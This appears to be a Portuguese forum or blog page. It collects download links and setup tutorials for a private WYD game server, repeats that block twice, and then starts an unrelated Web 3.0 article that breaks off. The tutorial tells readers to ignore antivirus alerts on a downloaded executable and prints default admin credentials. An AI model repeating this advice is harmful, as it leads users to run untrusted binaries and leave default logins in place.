vo postar o itemlist portugues para você ver algums codigos nao estao todos mais quase.
aproveitei e coloquei arma e set arch capa muito mais.
download: http://lix.in/2a86b3 ou http://rapidshare.com/files/10276693/C_pia_de_itemlist1.csv.html
=======================================================
ULTILITÁRIOS
WYD Efeitos de Natal.
Download http://www.4shared.com/account/file/64679963/ba2912d5/Grafico_natal_no_wyd.html
Grafico 7.50(novo).
Download http://www.4shared.com/account/file/64679963/ba2912d5/Grafico_natal_no_wyd.html
Unicórnio de Fogo.
Download http://www.4shared.com/account/file/64679989/c47fd645/Graficos_Unicornio_de_fogo.html
Tigre de Fogo.
Download http://www.4shared.com/account/file/64677285/214302bc/Tigre_De_Fogo.html
Gráfico Arco Desbugado (atualizado).
Download http://www.4shared.com/file/64958474/6a4a3b4/ArcoDesbug.html
Gráfico Gelo.
Download http://www.4shared.com/account/file/64679728/43092353/Grafico_Gelo.html
Gráfico Kefra.
Download http://www.4shared.com/account/file/64679766/c0ddcb50/Grafico_Kefra.html
Gráfico Armas e Sets [E].
Download http://www.4shared.com/account/file/64679336/baa397c9/Grafico_Armas_E.html
Fraps.
Download http://www.4shared.com/account/file/64679001/daceff0/Fraps.html
Gráfico Sela de Andaluz.
Download http://www.4shared.com/account/file/64679967/bd44d6cc/Grafico_Sela_Andaluz.html
Gráfico Skill 7.48.
Download http://www.4shared.com/account/file/64679977/a45fe78d/Grafico_Skill_748.html
Gráfico Kefra (monstro).
Download http://www.4shared.com/account/file/64680031/d9d96468/Kefra__Monstro_.html
Ombreiras.
Download http://www.4shared.com/account/file/64680092/ba3fdd58/OMBREIRA.html
Registro para WebSite
Download http://www.4shared.com/file/89735016/8a84f23d/REGISTRO_NO_SITE.html
EDITORES etc
WYD World Server III + Client + Tutoriais
http://rapidshare.de/files/40004104/World_Emulator_Package.exe.html
http://files.filefront.com/World+Emulator+Packageexe/;11074634;/fileinfo.html
WYD Sites.
http://www.4shared.com/account/file/64682193/66f34f72/WYD_Sites.html
WYD IP Change.(Configurador de IP do seu server)
http://www.4shared.com/account/file/64682007/b19e5a15/WYD_IP_Changer.html
IDS WYD Files WYD World(novo).
http://www.4shared.com/account/file/64730360/6d63fc56/IDS.html
http://www.4shared.com/file/65188433/4e18be7b/itemlist.html (com portões desbugados)
http://xeongames.forumeiros.com/downloads-f14/download-id-s-completo-v752-t947.htm
Editores de NPC.
http://www.4shared.com/account/file/64737773/77af0cc8/Editors_de_NPC.html
Converter a Mesh.
http://www.4shared.com/account/file/64681592/44878d6/Converter_a_MESH.html
Converter SkillData.csv para SkillData.bin.
http://www.4shared.com/file/64681913/b28c3b2c/Converter_Skilldatacsv_para_bin.html
Editor de ItemList.bin
http://www.4shared.com/account/file/64681957/d18d3a31/ItemList_Editor.html
Editor de ServList.bin
http://www.4shared.com/account/file/64681978/73044522/ServerList_Editor.html
WYD Editor (Todos).
http://www.4shared.com/account/file/64737773/77af0cc8/Editors_de_NPC.html
Editor de SkillData.
http://www.4shared.com/account/file/64677240/fd9cb93f/SkillDataEditor.html
Modificando IP's:
Coloque o arquivo de dentro da pasta WYD IP Changer na pasta do server,o execute,ao executar uma janela abrirá,nela você vai colocar seu ip.
Para velo vá em:
www.meuip.com.br
Se for criar um servidor de Hamachi:
Abra o hamachi,em cima haverá um número,este é seu IP
Coloque-o na janela onde fala:
IP:
No meu exemplo vai ficar assim:
IP:5.230.83.241
(HAMACHI)
Depois disso clique em Change!! e OK em todos.
-------------------------------------------------------------------------------------------------------------------------------
TUTO Como Fazer Sem Hamichi!!!
todos pergunta como que faza faz topico entao vou fazer um tuto!!!
e muito facio você pega vai nesse site:meuip.com.br
ai vai apareçe seu ip ai você vai na pasta BISRV/RUN ai coloca no serverlist!!!
assim:
0 0 SEU IP
0 1 SEU IP
1 0 SEU IP 3000
1 1 SEU IP 3000
1 2 SEU IP
Assim que e o serverlist!!!
ai você vai na pasta DBSRV/RUN
edita seu ip no:
adimim
edita assim:
0 SEU IP
1 SEU IP
2 SEU IP
3 SEU IP
4 SEU IP
5 SEU IP
6 SEU IP
7 SEU IP
8 SEU IP
9 SEU IP
AVISO:se você quezer que um dos GMS tenha algums comando coloca o ip dele embaxo do seu assim
0 seu ip
1 ip do GM
2 do outro GM
ai se nao quiser da comando pra ninguem você coloca so seu ip!!!
ainda na pasta DBSRV/RUN /localip
localip e assim que edita:
SEU IP
depois serverlist dinovo do mesmo jeito que akele outro la de cima:
0 0 SEU IP
0 1 SEU IP
1 0 SEU IP 3000
1 1 SEU IP 3000
1 2 SEU IP
assim
ai depois você vai na pasta TMSRV/RUN/biserver
ai você edita seu ip tanbem so que assim:
SEU IP 3000
apenas isso
depois você vai em:
localip
e so coloca seu ip mais nada!!!
depois serverlist edita do mesmo jeito que o outros!!!
0 SEU IP
1 SEU IP
2 SEU IP
3 SEU IP
4 SEU IP
5 SEU IP
6 SEU IP
7 SEU IP
8 SEU IP
9 SEU IP
assim
aviso esse nomes são de blocos de notas!!!
aviso:se seu ip nao e fixo,você tem que muda todo dia você liga o server ai se der erro você tem que muda!!!!
-----------------------------------------------------------------------------------------------------------------------------------------
Criando sala do hamachi:
ATENÇÃO:SÓ SERA NESCESSARIO SE SEU SERVER FOR COM HAMACHI
Logue-se no hamachi,clique no triângulo e depois no primeiro.
Na primeira barra digite o nome da sala e na segunda a senha.
Passe para quem querer jogar.
MAIS DETALHES SOBRE O HAMACHI
-----------------------------------------------------------------------------------------------------------------------------------------
TUTO Para Faze Seu Server Com Hamichi!!!
1:paço baxa o hamachi:
http://files.filefront.com/HamachiSetup+10061+enrar/;6288498;/fileinfo.html
2:istala o hamichi
3:vai no iniciar,todos os programas,hamichi,abra ele.....
4:vai ter ums numero la em cima do ip aki olha a ss!!!
[img]http://img212.imageshack.us/img212/7439/hamichi1do3.jpg
[/img]
ai você pega esse ip e vai na pasta BISRV,DRBSRV,TMSRV e coleque o ip que esta no hamichi...
se vcs quizerem so posta seus ip do hamichi que eu fasso pra vcs!!!
5:criar as salas veja aonde criar olhi a ss:
[list=]http://img89.imageshack.us/img89/1586/hamichi2xy9.jpg[/list]
ai você clica ali ai vai no segundo creat new alguma coisa assim....
e cria as salas ai quanto você quise a minha tem 20....
6:a de ultima e para as pessoa conecta no seu hamichi ai se quise coloca no seu forum do seu servvidor e so coloca la como que eles entrao.....
pronto seu hamichi estara pronto...
Ligando server:
Desligue a internet,vá na pasta do seu server,em seguida vá na pasta "DBSRV" e clique em run,em seguida clique em DBSRV.exe
Depois de fazer esses processos volte para a pasta do seu server,em seguida vá na pasta "TMSRV" e clique em run,em seguida clique em TMSRV.exe
Depois disso,volte para a pasta do seu server,em seguida vá na pasta "BISRV" e clique em run,em seguida clique em BISRV.exe
Ligue a internet novamente
Feito isso seu servidor já está ligado,para desliga-lo basta fechar as janelas do DBSRV,TMSRV,BISRV.
Criando contas:
Para criar contas,vá na pasta do seu server,em seguida "DBSRV",depois clique em run e depois vá a pasta account,em seguida clique duas veses em WYDacct.exe e coloque em cima a conta e em baixo a senha.
(O seu antivírus pode detecta-lo,mais não se preocupe.)
Colocando itens nas accs:
Vá na pasta do seu server,depois em "TMSRV",em seguida run,e depois clique em 4ftool-UG.exe.
Ao abrir,clique em abrir,vá em "DBSRV",depois run,em seguida accounts,clique na conta desejada.
E coloque nos lugares certos os IP's dos itens que vem dentro da pasta.
Resetando:
Logue-se no NPKO com a conta admin.
(Nessa pasta vem uma conta admin:warrior senha:gatinhas)
Depois de logar-se na acc busque pelo nome do jogador,selecione o char.
Mude o level e a xp para 0 depois em confirmar,em seguida salvar.
Pronto!!!
CREDITOS
Equipe "XeoN Games" (DE ONE)
Modificado e organizado por XKN
[/list]
_________________
By XKN @ -= ProxysX GrouP =-
WYD Server:
Escolha um servergame
SERVERGAME 1 => http://www.4shared.com/account/file/64676828/10367438/Server_WYD_613.html,
==================================================
SERVERGAME 2 =>
SERVIDOR 6.13: http://www.4shared.com/file/88347147/a4f901e0/SVR.html
CLIENT WYD 6.13: http://rapidshare.de/files/38667842/Client_WYD_TEBAS.exe.html
NPKO: http://www.4shared.com/file/65286533/2991d1d1/NPKO_BR_-_By_Equipe_Armagedon.html
Cadastro + Mudar Senha para WebSites:http://www.4shared.com/file/65660607/65d5bf9/Cadastro__Mudar_Senha.html
==================================================
SERVERGAME 3 =>
WYD Server Release 2.0 e 2.1.
http://www.4shared.com/account/file/64680242/c15777b/release_20_e_21.html
=================================================
SERVERGAME 4 =>
[u]WYD Server 6.13.
http://www.4shared.com/account/file/64676828/10367438/Server_WYD_613.html
================================================
SERVERGAME 5 =>
[u]WYD Server 6.56.
http://www.4shared.com/account/file/64732701/e13e0b11/WYD-SERVER_6156.html
===============================================
ABRIR SV 7.52
http://xeongames.forumeiros.com/tutoriais-f13/tutorial-abrir-server-versao-752-t916.htm
CRIANDO NPC
http://xeongames.forumeiros.com/tutoriais-f13/tutorialcriando-npc-no-752-t922.htm
CRIANDO ARCH
http://xeongames.forumeiros.com/tutoriais-f13/criando-arch-t952.htm
WYD IP Changer:
http://www.4shared.com/account/file/64682007/b19e5a15/WYD_IP_Changer.html
Download do hamachi:
http://files.filefront.com/HamachiSetup+10061+enrar/;6288498;/fileinfo.html
http://www.4shared.com/account/file/64730356/af2d0aa0/HamachiSetup-1025-pt-br.html
Linguagen [desbugado] (english).
http://www.4shared.com/account/file/64827004/6ff3824c/Language.html
========================================================
Outros Links:
pasta BISRV completa download: http://lix.in/4bb7db ou http://rapidshare.com/files/5244749/BISRV.rar.html
DBSRV:ja esta com criador de ACC: http://lix.in/f1ec36 ou http://rapidshare.com/files/10275661/DBSRV.rar.html
TMSRV com arch e tudo mais menos 8 skill download: http://lix.in/5e4070 ou http://rapidshare.com/files/5245845/TMSRV.rar.html
esta com arch e meus npc pronto tudinho pronto menos a 8 skill
xD
vo postar o itemlist portugues para você ver algums codigos nao estao todos mais quase.
aproveitei e coloquei arma e set arch capa muito mais.
download: http://lix.in/2a86b3 ou http://rapidshare.com/files/10276693/C_pia_de_itemlist1.csv.html
=======================================================
ULTILITÁRIOS
WYD Efeitos de Natal.
Download http://www.4shared.com/account/file/64679963/ba2912d5/Grafico_natal_no_wyd.html
Grafico 7.50(novo).
Download http://www.4shared.com/account/file/64679963/ba2912d5/Grafico_natal_no_wyd.html
Unicórnio de Fogo.
Download http://www.4shared.com/account/file/64679989/c47fd645/Graficos_Unicornio_de_fogo.html
Tigre de Fogo.
Download http://www.4shared.com/account/file/64677285/214302bc/Tigre_De_Fogo.html
Gráfico Arco Desbugado (atualizado).
Download http://www.4shared.com/file/64958474/6a4a3b4/ArcoDesbug.html
Gráfico Gelo.
Download http://www.4shared.com/account/file/64679728/43092353/Grafico_Gelo.html
Gráfico Kefra.
Download http://www.4shared.com/account/file/64679766/c0ddcb50/Grafico_Kefra.html
Gráfico Armas e Sets [E].
Download http://www.4shared.com/account/file/64679336/baa397c9/Grafico_Armas_E.html
Fraps.
Download http://www.4shared.com/account/file/64679001/daceff0/Fraps.html
Gráfico Sela de Andaluz.
Download http://www.4shared.com/account/file/64679967/bd44d6cc/Grafico_Sela_Andaluz.html
Gráfico Skill 7.48.
Download http://www.4shared.com/account/file/64679977/a45fe78d/Grafico_Skill_748.html
Gráfico Kefra (monstro).
Download http://www.4shared.com/account/file/64680031/d9d96468/Kefra__Monstro_.html
Ombreiras.
Download http://www.4shared.com/account/file/64680092/ba3fdd58/OMBREIRA.html
Registro para WebSite
Download http://www.4shared.com/file/89735016/8a84f23d/REGISTRO_NO_SITE.html
EDITORES etc
WYD World Server III + Client + Tutoriais
http://rapidshare.de/files/40004104/World_Emulator_Package.exe.html
http://files.filefront.com/World+Emulator+Packageexe/;11074634;/fileinfo.html
WYD Sites.
http://www.4shared.com/account/file/64682193/66f34f72/WYD_Sites.html
WYD IP Change.(Configurador de IP do seu server)
http://www.4shared.com/account/file/64682007/b19e5a15/WYD_IP_Changer.html
IDS WYD Files WYD World(novo).
http://www.4shared.com/account/file/64730360/6d63fc56/IDS.html
http://www.4shared.com/file/65188433/4e18be7b/itemlist.html (com portões desbugados)
http://xeongames.forumeiros.com/downloads-f14/download-id-s-completo-v752-t947.htm
Editores de NPC.
http://www.4shared.com/account/file/64737773/77af0cc8/Editors_de_NPC.html
Converter a Mesh.
http://www.4shared.com/account/file/64681592/44878d6/Converter_a_MESH.html
Converter SkillData.csv para SkillData.bin.
http://www.4shared.com/file/64681913/b28c3b2c/Converter_Skilldatacsv_para_bin.html
Editor de ItemList.bin
http://www.4shared.com/account/file/64681957/d18d3a31/ItemList_Editor.html
Editor de ServList.bin
http://www.4shared.com/account/file/64681978/73044522/ServerList_Editor.html
WYD Editor (Todos).
http://www.4shared.com/account/file/64737773/77af0cc8/Editors_de_NPC.html
Editor de SkillData.
http://www.4shared.com/account/file/64677240/fd9cb93f/SkillDataEditor.html
Modificando IP's:
Coloque o arquivo de dentro da pasta WYD IP Changer na pasta do server,o execute,ao executar uma janela abrirá,nela você vai colocar seu ip.
Para velo vá em:
www.meuip.com.br
Se for criar um servidor de Hamachi:
Abra o hamachi,em cima haverá um número,este é seu IP
Coloque-o na janela onde fala:
IP:
No meu exemplo vai ficar assim:
IP:5.230.83.241
(HAMACHI)
Depois disso clique em Change!! e OK em todos.
-------------------------------------------------------------------------------------------------------------------------------
TUTO Como Fazer Sem Hamichi!!!
todos pergunta como que faza faz topico entao vou fazer um tuto!!!
e muito facio você pega vai nesse site:meuip.com.br
ai vai apareçe seu ip ai você vai na pasta BISRV/RUN ai coloca no serverlist!!!
assim:
0 0 SEU IP
0 1 SEU IP
1 0 SEU IP 3000
1 1 SEU IP 3000
1 2 SEU IP
Assim que e o serverlist!!!
ai você vai na pasta DBSRV/RUN
edita seu ip no:
adimim
edita assim:
0 SEU IP
1 SEU IP
2 SEU IP
3 SEU IP
4 SEU IP
5 SEU IP
6 SEU IP
7 SEU IP
8 SEU IP
9 SEU IP
AVISO:se você quezer que um dos GMS tenha algums comando coloca o ip dele embaxo do seu assim
0 seu ip
1 ip do GM
2 do outro GM
ai se nao quiser da comando pra ninguem você coloca so seu ip!!!
ainda na pasta DBSRV/RUN /localip
localip e assim que edita:
SEU IP
depois serverlist dinovo do mesmo jeito que akele outro la de cima:
0 0 SEU IP
0 1 SEU IP
1 0 SEU IP 3000
1 1 SEU IP 3000
1 2 SEU IP
assim
ai depois você vai na pasta TMSRV/RUN/biserver
ai você edita seu ip tanbem so que assim:
SEU IP 3000
apenas isso
depois você vai em:
localip
e so coloca seu ip mais nada!!!
depois serverlist edita do mesmo jeito que o outros!!!
0 SEU IP
1 SEU IP
2 SEU IP
3 SEU IP
4 SEU IP
5 SEU IP
6 SEU IP
7 SEU IP
8 SEU IP
9 SEU IP
assim
aviso esse nomes são de blocos de notas!!!
aviso:se seu ip nao e fixo,você tem que muda todo dia você liga o server ai se der erro você tem que muda!!!!
-----------------------------------------------------------------------------------------------------------------------------------------
Criando sala do hamachi:
ATENÇÃO:SÓ SERA NESCESSARIO SE SEU SERVER FOR COM HAMACHI
Logue-se no hamachi,clique no triângulo e depois no primeiro.
Na primeira barra digite o nome da sala e na segunda a senha.
Passe para quem querer jogar.
MAIS DETALHES SOBRE O HAMACHI
-----------------------------------------------------------------------------------------------------------------------------------------
TUTO Para Faze Seu Server Com Hamichi!!!
1:paço baxa o hamachi:
http://files.filefront.com/HamachiSetup+10061+enrar/;6288498;/fileinfo.html
2:istala o hamichi
3:vai no iniciar,todos os programas,hamichi,abra ele.....
4:vai ter ums numero la em cima do ip aki olha a ss!!!
[img]http://img212.imageshack.us/img212/7439/hamichi1do3.jpg
[/img]
ai você pega esse ip e vai na pasta BISRV,DRBSRV,TMSRV e coleque o ip que esta no hamichi...
se vcs quizerem so posta seus ip do hamichi que eu fasso pra vcs!!!
5:criar as salas veja aonde criar olhi a ss:
[list=]http://img89.imageshack.us/img89/1586/hamichi2xy9.jpg[/list]
ai você clica ali ai vai no segundo creat new alguma coisa assim....
e cria as salas ai quanto você quise a minha tem 20....
6:a de ultima e para as pessoa conecta no seu hamichi ai se quise coloca no seu forum do seu servvidor e so coloca la como que eles entrao.....
pronto seu hamichi estara pronto...
Ligando server:
Desligue a internet,vá na pasta do seu server,em seguida vá na pasta "DBSRV" e clique em run,em seguida clique em DBSRV.exe
Depois de fazer esses processos volte para a pasta do seu server,em seguida vá na pasta "TMSRV" e clique em run,em seguida clique em TMSRV.exe
Depois disso,volte para a pasta do seu server,em seguida vá na pasta "BISRV" e clique em run,em seguida clique em BISRV.exe
Ligue a internet novamente
Feito isso seu servidor já está ligado,para desliga-lo basta fechar as janelas do DBSRV,TMSRV,BISRV.
Criando contas:
Para criar contas,vá na pasta do seu server,em seguida "DBSRV",depois clique em run e depois vá a pasta account,em seguida clique duas veses em WYDacct.exe e coloque em cima a conta e em baixo a senha.
(O seu antivírus pode detecta-lo,mais não se preocupe.)
Colocando itens nas accs:
Vá na pasta do seu server,depois em "TMSRV",em seguida run,e depois clique em 4ftool-UG.exe.
Ao abrir,clique em abrir,vá em "DBSRV",depois run,em seguida accounts,clique na conta desejada.
E coloque nos lugares certos os IP's dos itens que vem dentro da pasta.
Resetando:
Logue-se no NPKO com a conta admin.
(Nessa pasta vem uma conta admin:warrior senha:gatinhas)
Depois de logar-se na acc busque pelo nome do jogador,selecione o char.
Mude o level e a xp para 0 depois em confirmar,em seguida salvar.
Pronto!!!
CREDITOS
Equipe "XeoN Games" (DE ONE)
Modificado e organizado por XKN
[/list]
_________________
By XKN @ -= ProxysX GrouP =-
[NEWS] = A Evolução da Internet WEB 3.0 = Web semântica
O termo Web 3.0 foi empregado pela primeira vez pelo jornalista John Markoff, num artigo do New York Times e logo incorporado e rejeitado com igual ardor pela comunidade virtual. A principal reação vem da blogosfera. Nos diários virtuais de especialistas detratores, a crítica mais comum é a de que Web 3.0 nada mais é do que a tentativa de incutir nos internautas num termo de fácil assimilação para definir algo que ainda nem existe. Aliás, críticas idênticas já se fazem à Web 2.0.
A Web 3.0 propõe-se a ser, num período de cinco a dez anos, a terceira geração da Internet. A primeira, Web 1.0, foi a implantação e popularização da rede em si; a Web 2.0 é a que o mundo vive hoje, centrada nos mecanismos de busca como Google e nos sites de colaboração do internauta, como Wikipedia, YouTube e os sites de relacionamento social, como o Orkut. A Web 3.0 pretende ser a organização e o uso de maneira mais inteligente de todo o conhecimento já disponível na Internet.
Esta inovação está focada mais nas estruturas dos sites e menos no usuário. Pesquisa-se a convergência de várias tecnologias que já existem e que serão usadas ao mesmo tempo, num grande salto de sinergia. Banda larga, acesso móvel à internet e a tecnologia da semântica, todos utilizados juntos, de maneira inteligente e atingindo a maturidade ao mesmo tempo.
Assim, se passaria da World Wide Web (rede mundial) para World Wide Database (base de dados mundial), ou seja, se passaria de um mar de documentos para um mar de dados. Quando isso começar a acontecer de forma mais intensa, o próximo passo, num prazo de cinco a dez anos, será o desenvolvimento de programas que entendam como fazer melhor uso desses dados.
Adicionada a capacidade da semântica a um site, ele será mais eficiente. Ao se pesquisar algo, se terá respostas mais precisas. O usuário poderá fazer perguntas ao seu programa e ele será capaz de ajudá-lo de forma mais eficente, entender mais sua necessidade. O conceito de ”semântica da rede”, proposto pelo inglês Tim Berners-Lee, tem entre seus gurus Daniel Gruhl, um Ph.D. em engenharia eletrônica do MIT, é especializado em "compreensão das máquinas", e o misterioso Nova Spivack, que não revela muito sobre si, nem o nome verdadeiro, e se autodefine como empresário da alta tecnologia.
Um mecanismo de busca como o Google permite que o usuário pesquise o conteúdo de cada página,: se indicar o nome de um ator ou de um filme, todos os dados sobre este ator ou este filme aparecerão na tela. Poderá ainda utilizar a "busca avançada" para restringir um pouco mais os resultados. Mas se este usuário não se lembrar do nome do ator ou do filme, dificilmente encontrará meios de localizá-los. A Web 3.0 organizará e agrupará essas páginas, por temas, assuntos e interesses previamente expressos pelo internauta.. Por exemplo: todos os filmes policiais, que tenham cenas de perseguição de carros, produzidos nos últimos cinco anos etc.
Algumas empresas do Vale do Silício, na Califórnia, Estados Unidos, desenvolvem trabalhos nesse sentido, destacando-se o Almaden IBM Research Center, a Metaweb e a Radar Networks (de Nova Spivack). No Brasil, na PUC-Rio estão desenvolvendo trabalhos pioneiros para a Web 3.0 com ênfase na língua portuguesa. Paralelamente, estão em curso inúmeros projetos acadêmicos. E circula na comunidade da informática que em futuro próximo surgirão novidades nesse campo na Yahoo e no Skype.
Vantagens da Nova WEB 3.0
Transparência e Segurança;
Autenticidade; novas formas de fazer logins em sites
Navegabilidade; sistema de busca inteligente,
Velocidade da Informação, banco de dados proprio para cada usuario,
Inovação, novos softwares interçigados entre si
Behaviour Targeting (Segmentação Comportamental);
Reputação Digital; sistema de avaliação para os melhores sites
Identidade Digital; um banco de dados que reflete a personalidade de navegação do usuario na maquina do usuario.
Infotopia (Como as mentes produzem conhecimento);
Web Semântica;
Web em todos os lugares e aparelhos;
Marketing de influência social;
Web movel;
A Web 3.0 vai ligar tudo na Internet, desde um relogio até uma maquina de lavar.
O Daniel Gruhl, um dos diretores do Almaden IBM Research Center, fala sobre a WEB 3.0:
A Internet é como uma lista telefônica com bilhões de páginas. Um mecanismo de busca como o Google permite que o usuário pesquise o conteúdo de cada página --todos os Silva, para ficar na metáfora da lista-- e mesmo utilize a "busca avançada" para restringir um pouco mais os resultados --todos os Silva de São Paulo.
"A Web 3.0 organiza e agrupa essas páginas, por temas, assuntos e interesses previamente expressos pelo internauta", afirma Gruhl --todos os Silva que torcem para o Corinthians, votaram no PSDB e são alérgicos a frutos-do-mar, digamos. Embora a tecnologia ainda esteja na fase de pesquisa, suas possibilidades comerciais são infinitas. E as empresas não estão cegas para isso.
Uma das provas é o próprio centro do qual Gruhl faz parte. Baseado em San José, também no Vale do Silício californiano, tem como função encontrar novos usos comerciais para a rede de computadores e prever quais serão as próximas tendências, os novos YouTube, por exemplo. Gruhl, um Ph.D. em engenharia eletrônica do MIT, é especializado em "compreensão das máquinas".
Tanto esse aspecto futurista das pesquisas quanto o próprio termo Web 3.0 são responsáveis pelo maior volume de crítica que a iniciativa recebe. A principal reação vem, obviamente, da blogosfera. Nos diários virtuais de especialistas detratores, a crítica mais comum é a de que "Web 3.0" nada mais é do que a tentativa de empacotar num termo "vendável" algo que ainda nem existe. "Eu aposto que o futuro é mais "inteligência humana" do que "inteligência artificial'"
Pesquisa divulgada no início da semana pela Weber Shandwick, uma unidade da Interpublic Group, uma das maiores empresas de publicidade e marketing do mundo, mostra que tais críticas não são unânimes. Segundo o levantamento, 86% dos 104 executivos das maiores empresas americanas ouvidos acreditam que a inovação trazida pela Web 3.0 será o setor que mais ganhará importância ao longo de 2007.
"O surgimento do consumidor com mais poder significa que as companhias não podem mais simplesmente falar de inovação como uma estratégia do futuro", disse Billee Howard, do planejamento da Weber Shandwick. "As empresas precisam procurar novas maneiras de implantar isso".
O QUE É WEB SEMÂNTICA?
Demonstração da estrutura da Rede semântica.
A Web semântica é uma extensão da Web actual, que permitirá aos computadores e humanos trabalharem em cooperação. A Web semântica interliga significados de palavras e, neste âmbito, tem como finalidade conseguir atribuir um significado (sentido) aos conteúdos publicados na Internet de modo que seja perceptível tanto pelo humano como pelo computador.
A idéia da Web Semântica surgiu em 2001, quando Tim Berners-Lee, James Hendler e Ora Lassila publicaram um artigo na revista Scientific American, intitulado: “Web Semântica: um novo formato de conteúdo para a Web que tem significado para computadores vai iniciar uma revolução de novas possibilidades.”
O objectivo principal da Web semântica não é, pelo menos para já, treinar as máquinas para que se comportem como pessoas, mas sim desenvolver tecnologias e linguagens que tornem a informação legível para as máquinas. A finalidade passa pelo desenvolvimento de um modelo tecnológico que permita a partilha global de conhecimento assistido por máquinas (W3C 2001). A integração das linguagens ou tecnologias eXtensible Markup Language (XML), Resource Description Framework (RDF), arquiteturas de metadados, ontologias, agentes computacionais, entre outras, favorecerá o aparecimento de serviços Web que garantam a interoperabilidade e cooperação.
Ultimamente tem-se associado Web Semântica a Web 3.0, como um próximo movimento da Internet depois da Web 2.0 que já inicia seu crescimento.
==================================================
EXEMPLOS DE NAVEGADORES EM WEB 3.0 (Web semântica)
Hakia
http://www.hakia.com/
No hakia ele busca sua palavra seguindo 3 regras:
1. Credibilidade do site perante a web ( feita pela equipe da Hakia)
2. Mostra as mais recentes informações relacionada a busca
3. Atraves da relevância da busca
Formando assim tabbeds de: resultados na web em geral, Sites com alta credibilidade, imagens e noticias
sobre = http://company.hakia.com/about.html e http://company.hakia.com/benefits.html
powerset
http://www.powerset.com/
No powerset a busca é atraves de Factz pelo Wikipedia, Factz é como tabbeds dentro do wikipedia, ele busca artigos pelo site do wikipedia por ser considerado um site de alta confiabilidade muito usado por milhores de pessoas.
A palavre pesquisada é dividade em Factz, cada Factz abranje um assunto.
Exemplo: Se vc busca a palavra "oranges": vc terá a seguintes factz:
Que Representa : successo, prosperidade, bandeira, força, integridade, continentes
Que Contenha: dioxinas, tipos, diamantes, material e fruta.
Que Ofereça: pacotes, planos, Laranja e serviço.
Desta forma vc vai selecionar dentro da Factz (Que Representa , Que Contenha e Que Ofereça) o que realmente vc deseja saber sobre a palavre "orange"
Thinkbase
http://thinkbase.cs.auckland.ac.nz/
O Thinkbase, que exibe graficamente os relacionamentos entre dados, como os livros publicados publicados por um autor, seguidos dos filmes baseados nestes, por exemplo.
Influence Viewer
http://goosebumps4all.net/goi/
O Influence Viewer, assim com o Thinkbase, exibe um gráfico clicável sobre relacionamentos, desta vez sobre um domínio de influência, ou seja, quem influenciou quem (tratando-se principalmente de filósofos e pensadores).
Veja mais aqui: http://www.freebase.com/view/freebase/featured_application
==================================================
WEB 3.0 POR Tim Berners-Lee
Sir Timothy John Berners-Lee KBE é o inventor do World Wide Web (Rede de alcance mundial) na decada de 80 na CERN (Suíça) em 1989.
Berners-Lee nasceu em Londres em 8 de junho de 1955, Inglaterra e frequentou a Emanuel School em Wandsworth. Ele é um ex-aluno do Queen's College da Universidade de Oxford, onde construiu um computador de maneira revolucionária, que incluía ferro, um processador M6800, uma televisão velha, entre outras coisas. Foi também em Oxford que foi encontrado a hackear com um amigo e foi banido de usar o computador da universidade.
Ele trabalhou na Plessey Telecommunications Limited em 1976 como programador, e em 1978 trabalhou na D.G. Nash Limited onde trabalhou em programas de configuração de fonte e num sistema operacional.
Recentemente, Tim Berners-Lee foi considerado um dos maiores gênios vivos do mundo, segundo o levantamento "Top100 Living Geniuses", da consultoria Creators Synectics.
ENQUIRE foi um projeto desenvolvido por Tim Berners-Lee no segundo semestre de 1980, usado para reconhecer e armazenar associações de informação, ele tinha algumas das mesmas idéias da web e da web semântica, e serviu como base para o desenvolvimento das duas, mas era diferente em vários aspectos importantes, como no fato de não ser viável ser liberado para o público em geral. Ele foi implementado em uma máquina NORD-10, da Norsk Data, mas nunca foi publicado.
O primeiro servidor web, um NeXTcube usado por Berners-Lee no CERN
Internet com WWW:
WEB 2.0:
Os documentos estão hospedados em computadores dedicados/shell/vds e podem estar na forma de vídeos, sons, hipertextos e figuras. Para visualizar a informação, pode-se usar um programa de computador chamado navegador para descarregar informações (chamadas "documentos" ou "páginas") de servidores web (ou "sítios") e mostrá-los na tela do usuário. O usuário pode então seguir as hiperligações na página para outros documentos ou mesmo enviar informações de volta para o servidor para interagir com ele. O ato de seguir hiperligações é, comumente, chamado de "navegar" ou "surfar" na Web.
WEB 3.0
ENTREVISTA COM TIM BERNERS-LEE
Futuro
“A web é uma grande plataforma, e o importante é que é uma tela em branco, sobre a qual todos poderão fazer coisas com as quais eu nunca sequer sonhei. Há muitas coisas interessantes nascendo, como os dados linkados, a presença da web nos telefones celulares, que será especialmente importante em áreas rurais, por exemplo, onde a presença dos computadores é menor. Estamos começando uma Web Foundation, que pretende fazer da web algo conectado de forma humana. O importante para o futuro é pensar nos 80% da população que, hoje, não usam a internet: como a internet vai funcionar para essas pessoas? Uma das questões importantes para a missão da Web Foundation é que a web funcione como infraestrutura crítica para a sociedade. Por isso é importante que as universidades desenvolvam a web science, para entender tanto os aspectos técnicos quanto sociais da rede. Os telefones celulares serão muito importantes, mas a web sempre será acessada de formas diversas: às vezes eu preciso de coisas dentro do bolso, mas quando eu chego em casa quero uma tela de 52 polegadas, de resolução perfeita… O importante é que a web funcione de formas variadas”.
Web 3.0
“A Web 2.0 foi uma experiência muito frustrante para os usuários, porque eles colocam todas as informações em uma página e, quando acessam uma outra página, não podem usar aquele mesmo conteúdo. As redes sociais devem ser um sistema aberto, em que você controla seus dados, e essa informação pode ser usada por pessoas e sites diferentes. Você decide o que colocar e que uso isso vai ter, mas a partir de então é algo aberto. Essa é a visão de uma rede natural, feita de pessoas. Parte da ideia da rede de dados abertos linkados é a de ser a ‘rede de um amigo do amigo’: é uma rede de sites nos quais você concorda em ter seus dados. Você controla os seus dados, não uma empresa”.
Uso da Internet Semântica
“Hoje eu vejo a Internet Semântica como um movimento pelos dados abertos e eu encorajo a todos a colocarem seus dados linkados na Internet para que outros os possam utilizar. No futuro, as empresas e o governo irão nos fornecer os dados brutos e com eles poderemos fazer coisas fantásticas. Eles, por exemplo, não precisarão gastar com publicidade, já que as pessoas poderão fazer seus próprios catálogos a partir desses dados brutos”.
Sociedade
“Devemos tomar cuidado com novas formas de sociedade: tivemos vários exemplos desastrosos ao longo da história. O interessante é que em diferentes comunidades da rede as pessoas estão lidando com novas formas de democracia e de meritocracia: de como nós, como um grande grupo, tomamos uma decisão com base na maioria, mas também sabermos reagir quando nos damos conta que a minoria estava correta. Estou muito animado com os movimentos que tenho visto nesse sentido dentro da web”.
Pedofilia e crimes na internet
